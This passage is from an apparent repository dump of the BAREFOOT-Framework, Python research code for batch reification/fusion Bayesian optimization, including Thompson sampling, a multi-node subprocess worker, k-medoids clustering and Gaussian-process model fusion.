UCB\n\ndef thompson_sampling(y, std):\n \"\"\"\n Thompson sampling was first described by Thompson in 1933 as a solution to\n the multi-arm bandit problem.\n \n Thompson, W. 1933. “On the likelihood that one unknown probability\n exceeds another in view of the evidence of two samples”. Biometrika.\n 25(3/4): 285–294.\n\n Parameters\n ----------\n y : 1D vector Numpy Array\n The mean of the surrogate model at all test points used in the optimization.\n std : 1D vector Numpy Array\n The standard deviation from the surrogate model at all test points \n used in the optimization.\n\n Returns\n -------\n nu_star : float\n The maximum value from the Thompson Sampling.\n x_star : integer\n The index of the test point with the maximum value.\n tsVal : TYPE\n Sampled values for all test points.\n \"\"\"\n \n tsVal = random.normal(loc=y, scale=std)\n nu_star = np.max(tsVal)\n \n x_star = int(np.where(tsVal == nu_star)[0])\n \n return nu_star, x_star, tsVal" }, { "alpha_fraction": 0.5051613450050354, "alphanum_fraction": 0.5167880058288574, "avg_line_length": 51.59428405761719, "blob_id": "616bfc79bf210f4fada8d95be5a973ab3204db07", "content_id": "43141d8ae5e900f91883c909312244cf8254c352", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9203, "license_type": "no_license", "max_line_length": 132, "num_lines": 175, "path": "/subProcess.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 3 06:17:35 2021\n\n@author: Richard Couperthwaite\n\"\"\"\n\nfrom pickle import dump, load\nimport concurrent.futures\nimport numpy as np\nfrom sys import argv\nfrom time import sleep, time\nfrom multiprocessing import cpu_count\nfrom util import calculate_KG, calculate_EI, fused_calculate, calculate_TS, calculate_GPHedge\nimport logging\n\nif __name__ == \"__main__\":\n \"\"\"\n This module is used within the BAREFOOT framework to run as a multi-node instance\n This module runs on each of the subprocess nodes and controls the calculations on that\n node.\n \"\"\"\n param = argv\n \n # log_level = logging.DEBUG\n log_level = logging.INFO\n \n # create logging instance to record progress of the calculations\n logger = logging.getLogger('BAREFOOT.subprocess') \n logger.setLevel(log_level)\n fh = logging.FileHandler('BAREFOOT.log')\n fh.setLevel(log_level)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n # add the handler to the logger\n logger.addHandler(fh)\n\n logger.info(\"Subprocess {} | started\".format(param[1]))\n \n # Create a file to show that the subprocess has succesfully started\n with open(\"subprocess/sub{}.start\".format(param[1]), 'w') as f:\n f.write(\"subprocess started successfully\\n\\n\") \n \n not_close = True\n # keep the code running until it is shut down by the main node\n while not_close:\n try:\n try:\n # the main code will create these files when it is time for a \n # calculation to be done on the subprocess node\n with open(\"subprocess/sub{}.control\".format(param[1]), 'rb') as f:\n control_param = load(f)\n with open(\"subprocess/sub{}.start\".format(param[1]), 'a') as f:\n f.write(\"Control File Found - {} | {}\\n\".format(control_param[0], control_param[1]))\n logger.debug(\"Control File Found - {} | {}\\n\".format(control_param[0], control_param[1]))\n except FileExistsError:\n logger.debug(\"Control File could not be found\")\n control_param = [1,1]\n \n # The main node changes the control_param value to 0 to indicate that\n # there is a calculation to complete\n if control_param[0] == 0:\n logger.info(\"{} | New Subprocess calculation started\\n\".format(param[1]))\n # The main code also specifies which acquisition function to use\n if control_param[2] == \"KG\":\n function = calculate_KG\n elif control_param[2] == \"EI\":\n function = calculate_EI\n elif control_param[2] == \"TS\":\n function = calculate_TS\n elif control_param[2] == \"Hedge\":\n function = calculate_GPHedge\n \n start = time()\n # there is a difference between the calculations required for the\n # reduced order modesl (iteration) and the truth model (fused)\n if control_param[1] == \"iteration\":\n # Parameters for the calculations are determined in the\n # main node and are saved in .dump files for each subprocess\n with open(\"subprocess/{}.dump\".format(param[1]), 'rb') as f:\n parameters = load(f)\n logger.debug(\"{} | Reduced Order Model Calculation Started | {} Calculations\".format(param[1], len(parameters)))\n kg_output = []\n count = 0\n # Calculations are conducted in parallel using the concurrent.futures appraoch\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(parameters, executor.map(function,parameters)):\n params, results = result_from_process\n kg_output.append(results)\n count += 1\n if count % 200 == 0:\n logger.info(\"{} | {} / {} Calculations Completed\".format(param[1], count, len(parameters)))\n # Once calculations are completed, they are saved to the .output file for the main node to retrieve \n with open(\"subprocess/{}.output\".format(param[1]), 'wb') as f:\n dump(kg_output, f)\n \n \n elif control_param[1] == \"fused\":\n # Parameters for the calculations are determined in the\n # main node and are saved in .dump files for each subprocess\n with open(\"subprocess/{}.dump\".format(param[1]), 'rb') as f:\n parameters = load(f)\n logger.debug(\"{} | Fused Model Calculation Started | {} Calculations\".format(param[1], len(parameters)))\n if control_param[2] == \"Hedge\":\n fused_out = [[],[],[],[]]\n else:\n fused_output = []\n count = 0\n # Calculations are conducted in parallel using the concurrent.futures appraoch\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(parameters, executor.map(fused_calculate,parameters)):\n params, results = result_from_process\n if control_param[2] == \"Hedge\":\n fused_out[0].append(results[0][0])\n fused_out[1].append(results[0][1])\n fused_out[2].append(results[0][2])\n fused_out[3].append(results[0][3])\n else:\n fused_output.append(results[0])\n count += 1\n if count % 200 == 0:\n logger.info(\"{} | {} / {} Calculations Completed\".format(param[1], count, len(parameters)))\n # if the acquisition function approach is the GP Hedge portfolio\n # optimization approach then the output from this function needs\n # no further processing. If any of the others are being used,\n # there is some processing to attempt to remove duplicates\n if control_param[2] == \"Hedge\":\n with open(\"subprocess/{}.output\".format(param[1]), 'wb') as f:\n dump(fused_out, f)\n else:\n \n max_values = np.zeros((results[1],2))\n \n for ii in range(len(fused_output)):\n if max_values[fused_output[ii][1],0] != 0:\n if max_values[fused_output[ii][1],0] < fused_output[ii][0]:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n else:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n \n fused_output = max_values[np.where(max_values[:,0]!=0)] \n # Once calculations are completed, they are saved to the .output file for the main node to retrieve\n with open(\"subprocess/{}.output\".format(param[1]), 'wb') as f:\n dump(fused_output, f)\n \n # After the calculation is completed, the control file parameter\n # is changed to 1 to indicate that it has completed\n with open(\"subprocess/sub{}.control\".format(param[1]), 'wb') as f:\n control_param[0] = 1\n dump(control_param, f)\n \n logger.info(\"{} | Calculation Results Dumped | {} hours\\n\".format(param[1], np.round((time()-start)/3600, 4)))\n \n except Exception as exc:\n logger.critical(\"Error completing Calculation | {}\".format(exc))\n pass\n \n sleep(10)\n\n try:\n # when the main node has completed all of its calculations, it will\n # create a close file that triggers this code to complete\n with open('subprocess/close{}'.format(param[1]), 'r') as f:\n d = f.read()\n not_close = False\n logger.debug(\"{} | Close Command Found\".format(param[1]))\n except FileNotFoundError:\n pass\n \n with open(\"subprocess/sub{}.start\".format(param[1]), 'a') as f:\n f.write(\"subprocess finished successfully\\n\\n\")\n logger.info(\"{} | Subprocess Finished\".format(param[1]))" }, { "alpha_fraction": 0.5780366659164429, "alphanum_fraction": 0.5848425626754761, "avg_line_length": 36.86026382446289, "blob_id": "21d5a4b7864c47fe7c1d6a50f4c3ec8d6bb2f3b7", "content_id": "e9e0655bb94795e5a1e68a702fdfe5a879268442", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8669, "license_type": "no_license", "max_line_length": 103, "num_lines": 229, "path": "/kmedoids.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 12:01:34 2020\n\nI currently cannot find the source of this code to attribute it correctly. As\nsuch I will note explicitly that this code was not produced by myself, but if\nanyone reading this who does know the source of this code, please notify me\nso that it can be correcly attributed.\n\n\"\"\"\n\nimport numpy as np\nfrom scipy.sparse import csr_matrix\nimport random\n\nclass KMedoids:\n def __init__(self, n_cluster=2, max_iter=10, tol=0.1, start_prob=0.8, end_prob=0.99):\n '''Kmedoids constructor called'''\n if start_prob < 0 or start_prob >= 1 or end_prob < 0 or end_prob >= 1 or start_prob > end_prob:\n raise ValueError('Invalid input')\n self.n_cluster = n_cluster\n self.max_iter = max_iter\n self.tol = tol\n self.start_prob = start_prob\n self.end_prob = end_prob\n \n self.medoids = []\n self.clusters = {}\n self.tol_reached = float('inf')\n self.current_distance = 0\n \n self.__data = None\n self.__is_csr = None\n self.__rows = 0\n self.__columns = 0\n self.cluster_distances = {}\n \n \n def fit(self, data):\n self.__data = data\n self.__set_data_type() \n self.__start_algo()\n return self\n \n def __start_algo(self):\n self.__initialize_medoids()\n self.clusters, self.cluster_distances = self.__calculate_clusters(self.medoids)\n self.__update_clusters()\n \n def __update_clusters(self):\n for i in range(self.max_iter):\n cluster_dist_with_new_medoids = self.__swap_and_recalculate_clusters()\n if self.__is_new_cluster_dist_small(cluster_dist_with_new_medoids) == True:\n self.clusters, self.cluster_distances = self.__calculate_clusters(self.medoids)\n else:\n break\n\n def __is_new_cluster_dist_small(self, cluster_dist_with_new_medoids):\n existance_dist = self.calculate_distance_of_clusters()\n new_dist = self.calculate_distance_of_clusters(cluster_dist_with_new_medoids)\n \n if existance_dist > new_dist and (existance_dist - new_dist) > self.tol:\n self.medoids = cluster_dist_with_new_medoids.keys()\n return True\n return False\n \n def calculate_distance_of_clusters(self, cluster_dist=None):\n if cluster_dist == None:\n cluster_dist = self.cluster_distances\n dist = 0\n for medoid in cluster_dist.keys():\n dist += cluster_dist[medoid]\n return dist\n \n def __swap_and_recalculate_clusters(self):\n # http://www.math.le.ac.uk/people/ag153/homepage/KmeansKmedoids/Kmeans_Kmedoids.html\n cluster_dist = {}\n for medoid in self.medoids:\n is_shortest_medoid_found = False\n for data_index in self.clusters[medoid]:\n if data_index != medoid:\n cluster_list = list(self.clusters[medoid])\n cluster_list[self.clusters[medoid].index(data_index)] = medoid\n new_distance = self.calculate_inter_cluster_distance(data_index, cluster_list)\n if new_distance < self.cluster_distances[medoid]:\n cluster_dist[data_index] = new_distance\n is_shortest_medoid_found = True\n break\n if is_shortest_medoid_found == False:\n cluster_dist[medoid] = self.cluster_distances[medoid]\n return cluster_dist\n \n def calculate_inter_cluster_distance(self, medoid, cluster_list):\n distance = 0\n for data_index in cluster_list:\n distance += self.__get_distance(medoid, data_index)\n return distance/len(cluster_list)\n \n def __calculate_clusters(self, medoids):\n clusters = {}\n cluster_distances = {}\n for medoid in medoids:\n clusters[medoid] = []\n cluster_distances[medoid] = 0\n \n for row in range(self.__rows):\n nearest_medoid, nearest_distance = self.__get_shortest_distance_to_mediod(row, medoids)\n cluster_distances[nearest_medoid] += nearest_distance\n clusters[nearest_medoid].append(row)\n \n for medoid in medoids:\n cluster_distances[medoid] /= len(clusters[medoid])\n return clusters, cluster_distances\n \n \n def __get_shortest_distance_to_mediod(self, row_index, medoids):\n min_distance = float('inf')\n current_medoid = None\n \n for medoid in medoids:\n current_distance = self.__get_distance(medoid, row_index)\n if current_distance < min_distance:\n min_distance = current_distance\n current_medoid = medoid\n return current_medoid, min_distance\n\n def __initialize_medoids(self):\n '''Kmeans++ initialisation'''\n self.medoids.append(random.randint(0,self.__rows-1))\n while len(self.medoids) != self.n_cluster:\n self.medoids.append(self.__find_distant_medoid())\n \n def __find_distant_medoid(self):\n distances = []\n indices = []\n for row in range(self.__rows):\n indices.append(row)\n distances.append(self.__get_shortest_distance_to_mediod(row,self.medoids)[1])\n distances_index = np.argsort(distances)\n choosen_dist = self.__select_distant_medoid(distances_index)\n return indices[choosen_dist]\n \n def __select_distant_medoid(self, distances_index):\n start_index = round(self.start_prob*len(distances_index))\n end_index = round(self.end_prob*(len(distances_index)-1)) \n return distances_index[random.randint(start_index, end_index)]\n\n \n def __get_distance(self, x1, x2):\n a = self.__data[x1].toarray() if self.__is_csr == True else np.array(self.__data[x1])\n b = self.__data[x2].toarray() if self.__is_csr == True else np.array(self.__data[x2])\n return np.linalg.norm(a-b)\n \n def __set_data_type(self):\n '''to check whether the given input is of type \"list\" or \"csr\" '''\n if isinstance(self.__data,csr_matrix):\n self.__is_csr = True\n self.__rows = self.__data.shape[0]\n self.__columns = self.__data.shape[1]\n elif isinstance(self.__data,list):\n self.__is_csr = False\n self.__rows = len(self.__data)\n self.__columns = len(self.__data[0])\n else:\n raise ValueError('Invalid input')\n \n \n\ndef kMedoids(D, k, tmax=100):\n # determine dimensions of distance matrix D\n m, n = D.shape\n\n if k > n:\n raise Exception('too many medoids')\n\n # find a set of valid initial cluster medoid indices since we\n # can't seed different clusters with two points at the same location\n valid_medoid_inds = set(range(n))\n invalid_medoid_inds = set([])\n rs,cs = np.where(D==0)\n # the rows, cols must be shuffled because we will keep the first duplicate below\n index_shuf = list(range(len(rs)))\n np.random.shuffle(index_shuf)\n rs = rs[index_shuf]\n cs = cs[index_shuf]\n for r,c in zip(rs,cs):\n # if there are two points with a distance of 0...\n # keep the first one for cluster init\n if r < c and r not in invalid_medoid_inds:\n invalid_medoid_inds.add(c)\n valid_medoid_inds = list(valid_medoid_inds - invalid_medoid_inds)\n\n if k > len(valid_medoid_inds):\n raise Exception('too many medoids (after removing {} duplicate points)'.format(\n len(invalid_medoid_inds)))\n\n # randomly initialize an array of k medoid indices\n M = np.array(valid_medoid_inds)\n np.random.shuffle(M)\n M = np.sort(M[:k])\n\n # create a copy of the array of medoid indices\n Mnew = np.copy(M)\n\n # initialize a dictionary to represent clusters\n C = {}\n for t in range(tmax):\n # determine clusters, i. e. arrays of data indices\n J = np.argmin(D[:,M], axis=1)\n for kappa in range(k):\n C[kappa] = np.where(J==kappa)[0]\n # update cluster medoids\n for kappa in range(k):\n J = np.mean(D[np.ix_(C[kappa],C[kappa])],axis=1)\n j = np.argmin(J)\n Mnew[kappa] = C[kappa][j]\n np.sort(Mnew)\n # check for convergence\n if np.array_equal(M, Mnew):\n break\n M = np.copy(Mnew)\n else:\n # final update of cluster memberships\n J = np.argmin(D[:,M], axis=1)\n for kappa in range(k):\n C[kappa] = np.where(J==kappa)[0]\n\n # return results\n return M, C" }, { "alpha_fraction": 0.5283722877502441, "alphanum_fraction": 0.5394659042358398, "avg_line_length": 41.24896240234375, "blob_id": "b6dd9a94df05da2c17917b075805c138c585757c", "content_id": "0fdbe4cab36054cc89bb3cf006a18617ec8fb8aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10186, "license_type": "no_license", "max_line_length": 118, "num_lines": 241, "path": "/reificationFusion.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 13:48:44 2020\n\n@author: richardcouperthwaite\n\"\"\"\n\nimport numpy as np\nfrom gpModel import gp_model\nimport matplotlib.pyplot as plt\n\ndef reification(y,sig): \n # This function takes lists of means and variances from multiple models and \n # calculates the fused mean and variance following the Reification/Fusion approach\n # developed by D. Allaire. This function can handle any number of models.\n yM = np.tile(y, (len(y),1,1)).transpose()\n sigM = np.tile(sig, (len(y),1,1)).transpose()\n \n unoM = np.tile(np.diag(np.ones(len(y))), (yM.shape[0],1,1))\n zeroM = np.abs(unoM-1)\n \n yMT = np.transpose(yM, (0,2,1))\n sigMT = np.transpose(sigM, (0,2,1))\n \n # The following individual value calculations are compacted into the single calculation\n # for alpha, but are left here to aid in understanding of the equation\n \n # rho1 = np.sqrt(sigM)/np.sqrt((yM-yMT)**2 + sigM)\n # rho2 = np.sqrt(sigMT)/np.sqrt((yMT-yM)**2 + sigMT)\n # rho = (sigM/(sigM+sigMT))*np.sqrt(sigM)/np.sqrt((yM-yMT)**2 + sigM) + \\\n # (sigMT/(sigM+sigMT))*np.sqrt(sigMT)/np.sqrt((yMT-yM)**2 + sigMT)\n # sigma = rho*zeroM*(np.sqrt(sigM*sigMT)) + varDiag\n # alpha = np.linalg.inv(sigma)\n \n alpha = np.linalg.pinv(((sigM/(sigM+sigMT))*np.sqrt(sigM)/np.sqrt((yM-yMT)**2 + sigM) + \\\n (sigMT/(sigM+sigMT))*np.sqrt(sigMT)/np.sqrt((yMT-yM)**2 + sigMT))*zeroM*(np.sqrt(sigM*sigMT)) + unoM*sigM)\n \n w = (np.sum(alpha,1)/np.sum(alpha))\n \n mean = np.sum(w@y, axis = 0)\n var = 1/np.sum(alpha,(1,2))\n \n return mean, var\n\nclass model_reification():\n \"\"\"\n This python class has been developed to aid with the reification/fusion approach.\n The class provides methods that automate much of the process of defining the \n discrepancy GPs and calculating the fused mean and variance\n \"\"\"\n def __init__(self, x_train, y_train, l_param, sigma_f, sigma_n, model_mean,\n model_std, l_param_err, sigma_f_err, sigma_n_err, \n x_true, y_true, num_models, num_dim, kernel):\n self.x_train = x_train\n self.y_train = y_train\n self.model_mean = model_mean\n self.model_std = model_std\n self.model_hp = {\"l\": np.array(l_param),\n \"sf\": np.array(sigma_f),\n \"sn\": np.array(sigma_n)}\n self.err_mean = []\n self.err_std = []\n self.err_model_hp = {\"l\": np.array(l_param_err),\n \"sf\": np.array(sigma_f_err),\n \"sn\": np.array(sigma_n_err)}\n self.x_true = x_true\n self.y_true = y_true\n self.num_models = num_models\n self.num_dim = num_dim\n self.kernel = kernel\n self.gp_models = self.create_gps()\n self.gp_err_models = self.create_error_models()\n self.fused_GP = ''\n self.fused_y_mean = ''\n self.fused_y_std = ''\n \n def create_gps(self):\n \"\"\"\n GPs need to be created for each of the lower dimension information sources\n as used in the reification method. These can be multi-dimensional models.\n As a result, the x_train and y_train data needs to be added to the class\n as a list of numpy arrays.\n \"\"\"\n gp_models = []\n for i in range(self.num_models):\n new_model = gp_model(self.x_train[i], \n (self.y_train[i]-self.model_mean[i])/self.model_std[i], \n self.model_hp[\"l\"][i], \n self.model_hp[\"sf\"][i], \n self.model_hp[\"sn\"][i], \n self.num_dim, \n self.kernel)\n gp_models.append(new_model)\n return gp_models\n \n def create_error_models(self):\n \"\"\"\n In order to calculate the total error of the individual GPs an error\n model is created for each GP. The inputs to this are the error between\n the individual GP predictions and the truth value at all available truth\n data points. The prior_error value is subtracted from the difference to\n ensure that the points are centred around 0.\n \"\"\"\n gp_error_models = []\n for i in range(self.num_models):\n gpmodel_mean, gpmodel_var = self.gp_models[i].predict_var(self.x_true)\n gpmodel_mean = gpmodel_mean * self.model_std[i] + self.model_mean[i]\n error = np.abs(self.y_true-gpmodel_mean)\n self.err_mean.append(np.mean(error))\n self.err_std.append(np.std(error))\n if self.err_std[i] == 0:\n self.err_std[i] = 1\n new_model = gp_model(self.x_true, \n (error-self.err_mean[i])/self.err_std[i], \n self.err_model_hp[\"l\"][i], \n self.err_model_hp[\"sf\"][i], \n self.err_model_hp[\"sn\"][i], \n self.num_dim, \n self.kernel)\n gp_error_models.append(new_model)\n return gp_error_models\n \n def create_fused_GP(self, x_test, l_param, sigma_f, sigma_n, kernel):\n \"\"\"\n In this function we create the fused model by calculating the fused mean\n and variance at the x_test values and then fitting a GP model using the\n given hyperparameters\n \"\"\"\n model_mean = []\n model_var = []\n for i in range(len(self.gp_models)):\n m_mean, m_var = self.gp_models[i].predict_var(x_test)\n m_mean = m_mean * self.model_std[i] + self.model_mean[i]\n m_var = m_var * (self.model_std[i] ** 2)\n model_mean.append(m_mean)\n err_mean, err_var = self.gp_err_models[i].predict_var(x_test)\n err_mean = err_mean * self.err_std[i] + self.err_mean[i]\n model_var.append((err_mean)**2 + m_var)\n fused_mean, fused_var = reification(model_mean, model_var)\n self.fused_y_mean = np.mean(fused_mean[0:400:12])\n self.fused_y_std = np.std(fused_mean[0:400:12])\n if self.fused_y_std == 0:\n self.fused_y_std = 1\n fused_mean = (fused_mean - self.fused_y_mean)/self.fused_y_std\n self.fused_GP = gp_model(x_test[0:400:12], \n fused_mean[0:400:12], \n l_param, \n sigma_f, \n abs(fused_var[0:400:12])**(0.5), \n self.num_dim, \n kernel)\n return self.fused_GP\n \n def update_GP(self, new_x, new_y, model_index):\n \"\"\"\n Updates a given model in the reification object with new training data\n amd retrains the GP model\n \"\"\"\n self.x_train[model_index] = np.vstack((self.x_train[model_index], new_x))\n self.y_train[model_index] = np.append(self.y_train[model_index], new_y)\n self.gp_models[model_index].update(new_x, new_y, self.model_hp['sn'][model_index], False)\n \n def update_truth(self, new_x, new_y):\n \"\"\"\n Updates the truth model in the reification object with new training data\n and then recalculates the error models\n \"\"\"\n self.x_true = np.vstack((self.x_true, new_x))\n self.y_true = np.append(self.y_true, new_y)\n self.gp_err_models = self.create_error_models()\n \n def predict_low_order(self, x_predict, index):\n \"\"\"\n Provides a prediction from the posterior distribution of one of the \n low order models\n \"\"\"\n gpmodel_mean, gpmodel_var = self.gp_models[index].predict_var(x_predict)\n gpmodel_mean = gpmodel_mean * self.model_std[index] + self.model_mean[index]\n gpmodel_var = gpmodel_var * (self.model_std[index]**2)\n return gpmodel_mean, gpmodel_var\n \n def predict_fused_GP(self, x_predict):\n \"\"\"\n Provides a prediction from the posterior distribution of the Fused Model\n \"\"\"\n gpmodel_mean, gpmodel_var = self.fused_GP.predict_var(x_predict)\n gpmodel_mean = gpmodel_mean * self.fused_y_std + self.fused_y_mean\n gpmodel_var = gpmodel_var * (self.fused_y_std**2)\n return gpmodel_mean, np.diag(gpmodel_var)\n \n \ndef reification_old(y, sig):\n \"\"\"\n This function is coded to enable the reification of any number of models. \n This function relied on python loops and so was renovated to obtain the function\n above. This is left for potential additional understanding of the computational \n approach used.\n \"\"\"\n mean_fused = []\n var_fused = []\n \n rtest = []\n \n rho_bar = []\n for i in range(len(y)-1):\n for j in range(len(y)-i-1):\n rho1 = np.divide(np.sqrt(sig[i]), np.sqrt((y[i]-y[j+i+1])**2 + sig[i]))\n rtest.append(rho1)\n rho2 = np.divide(np.sqrt(sig[j+i+1]), np.sqrt((y[j+i+1]-y[i])**2 + sig[j+i+1]))\n rtest.append(rho2)\n rho_bar_ij = np.divide(sig[j+i+1], (sig[i]+sig[j+i+1]))*rho1 + np.divide(sig[i], (sig[i]+sig[j+i+1]))*rho2\n rho_bar_ij[np.where(rho_bar_ij>0.99)] = 0.99\n rho_bar.append(rho_bar_ij)\n \n mm = rho_bar[0].shape[0]\n \n sigma = np.zeros((len(y), len(y)))\n \n for i in range(mm):\n for j in range(len(y)):\n for k in range(len(y)-j):\n jj = j\n kk = k+j\n if jj == kk:\n sigma[jj,kk] = sig[jj][i]\n else:\n sigma[jj,kk] = rho_bar[kk+jj-1][i]*np.sqrt(sig[jj][i]*sig[kk][i])\n sigma[kk,jj] = rho_bar[kk+jj-1][i]*np.sqrt(sig[jj][i]*sig[kk][i])\n\n alpha = np.linalg.inv(sigma)\n \n w = np.sum(alpha,1)/np.sum(alpha)\n mu = y[0][i]\n for j in range(len(y)-1):\n mu = np.hstack((mu,y[j+1][i]))\n mean = np.sum(w@mu)\n \n mean_fused.append(mean)\n var_fused.append(1/np.sum(alpha))\n \n return np.array(mean_fused), np.array(var_fused)\n " }, { "alpha_fraction": 0.5435008406639099, "alphanum_fraction": 0.5497400164604187, "avg_line_length": 51.63503646850586, "blob_id": "e0412e60a824c1a2b4f655724b84be8c0a490adf", "content_id": "ee6defa83069045856a18eb647b88c4e492ffdf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 86550, "license_type": "no_license", "max_line_length": 159, "num_lines": 1644, "path": "/barefoot.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 8 08:11:50 2021\n\n@author: Richard Couperthwaite\n\"\"\"\n\nimport os\nfrom pickle import load, dump\nimport subprocess\nfrom time import time, sleep\nfrom shutil import rmtree\nimport numpy as np\nimport pandas as pd\nfrom reificationFusion import model_reification\nimport concurrent.futures\nfrom multiprocessing import cpu_count\nfrom copy import deepcopy\nfrom util import k_medoids, cartesian, call_model, apply_constraints\nfrom util import calculate_KG, calculate_EI, fused_calculate, calculate_TS, calculate_Greedy\nfrom util import calculate_GPHedge, evaluateFusedModel\nimport logging\n\nclass barefoot():\n def __init__(self, ROMModelList=[], TruthModel=[], calcInitData=True, \n initDataPathorNum=[], multiNode=0, workingDir=\".\", \n calculationName=\"Calculation\", nDim=1, input_resolution=5, restore_calc=False,\n updateROMafterTM=False, externalTM=False, acquisitionFunc=\"KG\",\n A=[], b=[], Aeq=[], beq=[], lb=[], ub=[], func=[], keepSubRunning=True, \n verbose=False, sampleScheme=\"LHS\", tmSampleOpt=\"Greedy\", logname=\"BAREFOOT\",\n maximize=True):\n \"\"\"\n Python Class for Batch Reification/Fusion Optimization (BAREFOOT) Framework Calculations\n\n Parameters\n ----------\n ROMModelList : This is the list of functions that are the cheap information sources.\n These need to be in a form that ensures that by providing the unit hypercube\n input, the function will provide the required output\n TruthModel : This is the Truth model, or the function that needs to be optimized.\n calcInitData : This variable controls whether the initial data is calculated for\n each of the models or is retrieved from a file\n initDataPathorNum : This variable holds the number of initial datapoints to evaluate for each\n information source (including the Truth Model), or, when initial data is \n loaded from a file, holds the path to the initial data file\n multiNode : This variable reflects the number of subprocesses that will be used\n for the calculations. A value of zero indicates all calculations will\n be completed on the main compute node.\n workingDir : This is the path to the working directory. In some cases it may be desirable\n to store data separately from the code, this will allow the data to be stored\n in alternate locations. Can also be used if the relative directory reference\n is not working correctly.\n calculationName : This is the name for the calculation and will change the results directory name\n nDim : The number of dimensions for the input space that will be used\n restore_calc : This parameter toggles whether the framework data is set up from the information\n provided or retrieved from a save_state file. This can be used to restart a calculation\n updateROMafterTM : This parameter allows the reduced order models to be retrained after getting more data\n from the Truth Model. The model function calls do not change, so the training needs to \n reflect in the same function.\n externalTM : In cases where it is necessary to evaluate the Truth Model separate to the\n framework (for example, if the Truth Model is an actual experiment), this toggles\n the output of the predicted points to a separate file for use externally. The\n framework is shut down after the data is output, see test examples for how to restart\n the framework after the external Truth Model has been evaluated\n acquisitionFunc : The acquisition function to use to evaluate the next best points for the reduced\n order models. Currently the options are \"KG\" for Knowledge Gradient and \"EI\" for expected\n improvement.\n A, b, Aeq, beq : Equality and inequality constraints according to the following equations:\n 1) A*x <= b\n 2) Aeq*x == b\n ub, lb : Upper bounds and lower bounds for inputs, all inputs must receive a value\n (Specify 0 for lb and 1 for ub if there is no bound for that input)\n func : function constraints, must take the input matrix (x) and output a vector of length\n equal to the number of samples in the input matrix (x) with boolean values.\n keepSubRunning : Determines whether the subprocesses are left running while calling the Truth Model\n verbose : Determines the logging level for tracking the calculations.\n \n \"\"\"\n if verbose:\n log_level = logging.DEBUG\n else:\n log_level = logging.INFO\n \n # create logger to output framework progress\n self.logger = logging.getLogger(logname)\n self.logger.setLevel(log_level)\n fh = logging.FileHandler('{}.log'.format(logname))\n fh.setLevel(log_level)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n # add the handler to the logger\n self.logger.addHandler(fh)\n \n \n self.logger.info(\"#########################################################\")\n self.logger.info(\"# #\")\n self.logger.info(\"# Start BAREFOOT Framework Initialization #\")\n self.logger.info(\"# #\")\n self.logger.info(\"#########################################################\")\n \n # Restore a previous calculation and restart the timer or load new\n # information and initialize\n \n if restore_calc:\n if externalTM:\n self.__external_TM_data_load(workingDir, calculationName)\n else:\n self.__load_from_save(workingDir, calculationName)\n self.timeCheck = time()\n self.logger.info(\"Previous Save State Restored\")\n else:\n self.timeCheck = time()\n self.ROM = ROMModelList\n self.TM = TruthModel\n self.TMInitInput = []\n self.TMInitOutput = []\n self.ROMInitInput = []\n self.ROMInitOutput = []\n self.inputLabels = []\n self.multinode = multiNode\n self.workingDir = workingDir\n self.calculationName = calculationName\n self.calcInitData = calcInitData\n self.initDataPathorNum = initDataPathorNum\n self.currentIteration = -1\n self.maximize = maximize\n if tmSampleOpt in [\"Hedge\", \"Greedy\", \"EI\", \"KG\", \"TS\"]:\n self.tmSampleOpt = tmSampleOpt\n else:\n self.tmSampleOpt = \"Greedy\"\n self.logger.warning(\"Invalid Truth Model Acquisition Function! Using default (Greedy).\")\n self.nDim = nDim\n self.res = input_resolution\n self.A = A\n self.b = b\n self.Aeq = Aeq\n self.beq = beq\n self.ub = ub\n self.lb = ub\n self.constr_func = func\n if sampleScheme in [\"LHS\", \"Grid\", \"Custom\"]:\n self.sampleScheme = sampleScheme\n else:\n self.sampleScheme = \"LHS\"\n self.logger.warning(\"Invalid Sample Scheme! Using default (LHS).\")\n self.keepSubRunning = keepSubRunning\n self.updateROMafterTM = updateROMafterTM\n self.externalTM = externalTM\n if acquisitionFunc in [\"Hedge\", \"Greedy\", \"EI\", \"KG\", \"TS\"]:\n self.acquisitionFunc = acquisitionFunc\n else:\n self.acquisitionFunc = \"KG\"\n self.logger.warning(\"Invalid ROM Acquisition Function! Using default (KG).\")\n self.__create_dir_and_files()\n self.__create_output_dataframes()\n self.__get_initial_data__()\n self.logger.info(\"Initialization Completed\") \n \n \n def __create_dir_and_files(self):\n # Create the required directories for saving the results and the subprocess\n # information if applicable\n try:\n os.mkdir('{}/results'.format(self.workingDir))\n self.logger.debug(\"Results Directory Created Successfully\")\n except FileExistsError:\n self.logger.debug(\"Results Directory Already Exists\")\n try:\n os.mkdir('{}/data'.format(self.workingDir))\n self.logger.debug(\"Data Directory Created Successfully\")\n except FileExistsError:\n self.logger.debug(\"Data Directory Already Exists\")\n try:\n os.mkdir('{}/data/parameterSets'.format(self.workingDir))\n self.logger.debug(\"Parameter Set Directory Created Successfully\")\n except FileExistsError:\n self.logger.debug(\"Parameter Set Directory Already Exists\")\n try:\n 